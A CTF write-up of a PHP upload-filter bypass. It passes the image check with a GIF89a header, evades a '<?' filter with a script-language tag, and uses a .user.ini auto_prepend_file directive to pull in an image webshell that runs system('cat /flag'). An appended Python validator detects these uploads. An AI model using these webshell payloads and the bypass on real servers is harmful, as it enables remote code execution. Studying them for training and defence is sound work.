File Upload
Blacklist
The upload check calls PHP's exif_imagetype() function.
This can be bypassed with the GIF89a file header.
The file content is filtered for <?
This can be bypassed with <script language='php'>
Modifying the MIME type and using special extensions both failed.
Correct approach:
Use .user.ini
.user.ini
First, look at the introduction to .user.ini in the PHP manual:
That is, .user.ini lets us set php.ini settings whose mode is PHP_INI_PERDIR or PHP_INI_USER, and .user.ini is available whenever the server runs PHP in CGI/FastCGI mode.
P牛's article mentions two interesting settings: auto_prepend_file and auto_append_file
Next, look at the manual's definitions of these two settings:
Roughly: we specify a file (such as a.jpg), and that file is then included by the PHP file being executed (e.g. index.php), similar to inserting require('./a.jpg'); into index.php.
The difference between the two is that auto_prepend_file inserts the file at the start, while auto_append_file inserts it at the end (the setting has no effect if the script has already called exit()).
With .user.ini analyzed, the approach should be clearer. We can upload a .user.ini like this:
GIF89a
auto_prepend_file=a.jpg
Then upload an image webshell a.jpg like this:
GIF89a
<script language='php'>system('cat /flag');</script>
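This makes the PHP files in the upload directory include a.jpg,
which is equivalent to calling require().
Visiting a PHP file in the upload directory then returns the flag.
Alternatively, write a one-line webshell into a.jpg,
connect with China Chopper (菜刀), and find the flag yourself.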
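From the defender's side, both uploads described above are caught by checking the file name and the content rather than only the magic bytes. The following is an added example, not code from the original writeup; the function name inspect_upload and the sample data are constructed for illustration.

```python
import re

# Per-directory config files that PHP (CGI/FastCGI) or the web server reads
# from the served directory; an upload handler should never accept these names.
CONFIG_NAMES = {".user.ini", ".htaccess"}

# INI directives that make every PHP script in the directory include a file.
INCLUDE_DIRECTIVE = re.compile(rb"^\s*auto_(?:prepend|append)_file\s*=", re.I | re.M)

# PHP code openers, including the <script language=php> form that slips past
# a filter looking only for "<?".
PHP_OPENER = re.compile(rb"<\?|<script[^>]*language\s*=\s*['\"]?php", re.I)

# Magic bytes that satisfy a header-only check such as exif_imagetype().
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n")


def inspect_upload(filename: str, data: bytes) -> list[str]:
    """Return the reasons this upload should be rejected (empty list = none found)."""
    reasons = []
    # Compare on the base name only, case-insensitively.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].strip().lower()
    if name in CONFIG_NAMES:
        reasons.append("per-directory config file name")
    if INCLUDE_DIRECTIVE.search(data):
        reasons.append("auto_prepend_file/auto_append_file directive")
    if PHP_OPENER.search(data):
        if data.startswith(IMAGE_MAGIC):
            reasons.append("PHP code behind an image header")
        else:
            reasons.append("PHP code in upload")
    return reasons


# Constructed samples mirroring the two files described above, plus a benign one.
SAMPLES = {
    ".user.ini": b"GIF89a\nauto_prepend_file=a.jpg\n",
    "a.jpg": b"GIF89a\n<script language='php'>system('cat /flag');</script>\n",
    "photo.gif": b"GIF89a" + bytes(32),  # harmless placeholder image bytes
}

if __name__ == "__main__":
    for fname, body in SAMPLES.items():
        print(fname, "->", inspect_upload(fname, body) or "ok")
```

A byte scan like this can false-positive on real binary images, so re-encoding accepted images and storing uploads in a location where PHP is not executed remain the primary controls.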